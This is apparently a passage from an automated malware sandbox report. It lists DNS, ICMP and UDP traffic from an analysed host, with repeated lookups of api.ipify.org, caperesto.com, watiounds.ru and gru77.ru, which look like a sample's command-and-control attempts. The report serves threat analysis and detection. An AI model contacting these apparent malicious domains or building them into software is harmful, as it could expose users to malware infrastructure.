                                          Apr 29, 2021 08:20:50.449642897 CEST5319853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:52.462131977 CEST5319853192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:53.471081018 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:54.485244036 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:54.612215042 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:55.773310900 CEST5002753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:56.783790112 CEST5002753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:57.512105942 CEST53531988.8.8.8192.168.2.22
                                          Apr 29, 2021 08:20:57.797938108 CEST5002753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:20:59.810934067 CEST5002753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:00.822374105 CEST53500278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:01.833441019 CEST53500278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:02.847553015 CEST53500278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:03.630489111 CEST5924553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:04.631581068 CEST5924553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:04.860924006 CEST53500278.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:05.645612955 CEST5924553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:07.658106089 CEST5924553192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:08.680171013 CEST53592458.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:09.680903912 CEST53592458.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:09.806315899 CEST53592458.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:10.992656946 CEST5584053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:11.995584965 CEST5584053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:12.707380056 CEST53592458.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:13.009659052 CEST5584053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:15.021749020 CEST5584053192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:16.045171976 CEST53558408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:17.048170090 CEST53558408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:18.061734915 CEST53558408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:18.852174044 CEST6166753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:19.858361959 CEST6166753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:20.074213028 CEST53558408.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:20.872631073 CEST6166753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:22.885135889 CEST6166753192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:22.929033041 CEST53616678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:24.907818079 CEST53616678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:24.983545065 CEST53616678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:25.241588116 CEST6373653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:26.255305052 CEST6373653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:27.269269943 CEST6373653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:27.934767962 CEST53616678.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:29.281857967 CEST6373653192.168.2.228.8.8.8
                                          Apr 29, 2021 08:21:30.293646097 CEST53637368.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:30.334377050 CEST53637368.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:32.321976900 CEST53637368.8.8.8192.168.2.22
                                          Apr 29, 2021 08:21:34.334450960 CEST53637368.8.8.8192.168.2.22

                                          ICMP Packets

                                          TimestampSource IPDest IPChecksumCodeType
                                          Apr 29, 2021 08:16:14.954530001 CEST192.168.2.228.8.8.8d003(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:21.040251970 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:22.054483891 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:24.066174984 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:28.406814098 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:29.420586109 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:31.433769941 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:36.708849907 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:37.734040976 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:39.746092081 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:42.494949102 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:44.488661051 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:45.523610115 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:51.344206095 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:52.352483034 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:16:54.364048958 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:00.207170963 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:02.152940035 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:04.165054083 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:08.109281063 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:09.123135090 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:11.160237074 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:15.460561037 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:16.474311113 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:18.487123013 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:23.323301077 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:24.339191914 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:26.349889994 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:29.713418007 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:31.703850031 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:32.832442045 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:38.563358068 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:39.577039957 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:41.589862108 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:44.952120066 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:46.943725109 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:48.959819078 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:53.806066036 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:54.820655107 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:17:56.831805944 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:00.213932037 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:02.168009996 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:04.180217028 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:09.004101992 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:10.018516064 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:12.031634092 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:16.364892960 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:17.380918026 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:19.392772913 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:24.215378046 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:25.229895115 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:27.242413998 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:31.577241898 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:34.603406906 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:38.471209049 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:40.453985929 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:42.466293097 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:45.806015968 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:46.823182106 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:47.858175039 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:53.677397013 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:54.685524940 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:18:56.697010994 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:01.016484022 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:02.031833887 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:04.045535088 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:08.881082058 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:09.895190001 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:11.906925917 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:16.245007038 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:19.270733118 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:24.075730085 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:25.088860035 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:27.101955891 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:31.423716068 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:32.438117027 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:34.449702978 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:38.397759914 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:39.411674023 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:41.424417973 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:45.745914936 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:46.759455919 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:48.772351027 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:53.671226025 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:54.685568094 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:19:56.697750092 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:01.035204887 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:02.049459934 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:04.062210083 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:08.882946968 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:09.897747993 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:11.909370899 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:16.247031927 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:17.260303974 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:19.273535967 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:24.063188076 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:25.076313019 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:27.088639021 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:31.427759886 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:32.441075087 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:34.453242064 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:39.293160915 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:40.307079077 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:42.320337057 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:46.638431072 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:47.652723074 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:49.664382935 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:54.485485077 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:20:57.512278080 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:01.833712101 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:02.847661972 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:04.861027956 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:09.681041956 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:12.707587957 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:17.048365116 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:18.061836004 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:20.074354887 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:24.907928944 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:27.934951067 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:30.334559917 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:32.322263956 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable
                                          Apr 29, 2021 08:21:34.334558964 CEST192.168.2.228.8.8.8cffe(Port unreachable)Destination Unreachable

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Apr 29, 2021 08:16:08.363516092 CEST192.168.2.228.8.8.80xb163Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.413414001 CEST192.168.2.228.8.8.80xb163Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:08.895751953 CEST192.168.2.228.8.8.80x82b3Standard query (0)caperesto.comA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:09.905514002 CEST192.168.2.228.8.8.80x82b3Standard query (0)caperesto.comA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:10.919728041 CEST192.168.2.228.8.8.80x82b3Standard query (0)caperesto.comA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:14.649616003 CEST192.168.2.228.8.8.80x71ddStandard query (0)watiounds.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:14.984148026 CEST192.168.2.228.8.8.80xfc39Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:15.990485907 CEST192.168.2.228.8.8.80xfc39Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:17.004389048 CEST192.168.2.228.8.8.80xfc39Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:19.016701937 CEST192.168.2.228.8.8.80xfc39Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:22.342195034 CEST192.168.2.228.8.8.80x9175Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:23.354099035 CEST192.168.2.228.8.8.80x9175Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:24.368284941 CEST192.168.2.228.8.8.80x9175Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:26.381151915 CEST192.168.2.228.8.8.80x9175Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:30.055157900 CEST192.168.2.228.8.8.80xc6ccStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:31.660348892 CEST192.168.2.228.8.8.80xc6ccStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:32.684864044 CEST192.168.2.228.8.8.80xc6ccStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:34.696523905 CEST192.168.2.228.8.8.80xc6ccStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:37.411439896 CEST192.168.2.228.8.8.80xd92dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:38.425276041 CEST192.168.2.228.8.8.80xd92dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:39.439512968 CEST192.168.2.228.8.8.80xd92dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:41.451527119 CEST192.168.2.228.8.8.80xd92dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:45.281686068 CEST192.168.2.228.8.8.80x2cStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:46.288121939 CEST192.168.2.228.8.8.80x2cStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:47.302200079 CEST192.168.2.228.8.8.80x2cStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:49.314940929 CEST192.168.2.228.8.8.80x2cStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:55.077754021 CEST192.168.2.228.8.8.80xda3eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:56.085882902 CEST192.168.2.228.8.8.80xda3eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:57.099900961 CEST192.168.2.228.8.8.80xda3eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:16:59.112571001 CEST192.168.2.228.8.8.80xda3eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:02.051995039 CEST192.168.2.228.8.8.80x21e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:03.059897900 CEST192.168.2.228.8.8.80x21e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:04.073868990 CEST192.168.2.228.8.8.80x21e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:06.086097002 CEST192.168.2.228.8.8.80x21e1Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:09.408236980 CEST192.168.2.228.8.8.80x6365Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:10.408071995 CEST192.168.2.228.8.8.80x6365Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:11.421968937 CEST192.168.2.228.8.8.80x6365Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:13.434796095 CEST192.168.2.228.8.8.80x6365Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:17.270561934 CEST192.168.2.228.8.8.80x868Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:18.270761013 CEST192.168.2.228.8.8.80x868Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:19.285089970 CEST192.168.2.228.8.8.80x868Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:21.297862053 CEST192.168.2.228.8.8.80x868Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:24.627171993 CEST192.168.2.228.8.8.80x3fe2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:25.635420084 CEST192.168.2.228.8.8.80x3fe2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:26.649065018 CEST192.168.2.228.8.8.80x3fe2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:28.661513090 CEST192.168.2.228.8.8.80x3fe2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:32.499511003 CEST192.168.2.228.8.8.80x77b3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:33.513519049 CEST192.168.2.228.8.8.80x77b3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:34.527468920 CEST192.168.2.228.8.8.80x77b3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:36.540182114 CEST192.168.2.228.8.8.80x77b3Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:39.866198063 CEST192.168.2.228.8.8.80x91e8Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:40.877504110 CEST192.168.2.228.8.8.80x91e8Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:41.891549110 CEST192.168.2.228.8.8.80x91e8Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:43.904705048 CEST192.168.2.228.8.8.80x91e8Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:47.749638081 CEST192.168.2.228.8.8.80x76deStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:48.756294012 CEST192.168.2.228.8.8.80x76deStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:49.770554066 CEST192.168.2.228.8.8.80x76deStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:51.782840967 CEST192.168.2.228.8.8.80x76deStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:55.098718882 CEST192.168.2.228.8.8.80xc63dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:56.104554892 CEST192.168.2.228.8.8.80xc63dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:57.118822098 CEST192.168.2.228.8.8.80xc63dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:17:59.130877972 CEST192.168.2.228.8.8.80xc63dStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:02.951102972 CEST192.168.2.228.8.8.80xe31eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:03.952163935 CEST192.168.2.228.8.8.80xe31eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:04.966222048 CEST192.168.2.228.8.8.80xe31eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:06.978399038 CEST192.168.2.228.8.8.80xe31eStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:10.310333014 CEST192.168.2.228.8.8.80x5877Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:11.315612078 CEST192.168.2.228.8.8.80x5877Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:12.329812050 CEST192.168.2.228.8.8.80x5877Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:14.342727900 CEST192.168.2.228.8.8.80x5877Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:18.157483101 CEST192.168.2.228.8.8.80xece2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:19.163316011 CEST192.168.2.228.8.8.80xece2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:20.177546024 CEST192.168.2.228.8.8.80xece2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:22.190094948 CEST192.168.2.228.8.8.80xece2Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:25.516889095 CEST192.168.2.228.8.8.80x1692Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:26.527303934 CEST192.168.2.228.8.8.80x1692Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:27.541420937 CEST192.168.2.228.8.8.80x1692Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:29.553545952 CEST192.168.2.228.8.8.80x1692Standard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:33.377130032 CEST192.168.2.228.8.8.80x1b7fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:34.390263081 CEST192.168.2.228.8.8.80x1b7fStandard query (0)gru77.ruA (IP address)IN (0x0001)
                                          Apr 29, 2021 08:18:35.404262066 CEST192.168.2.228.8.8.80x1b7fStandard query (0)gru77.ruA (IP address)IN (0x0001)
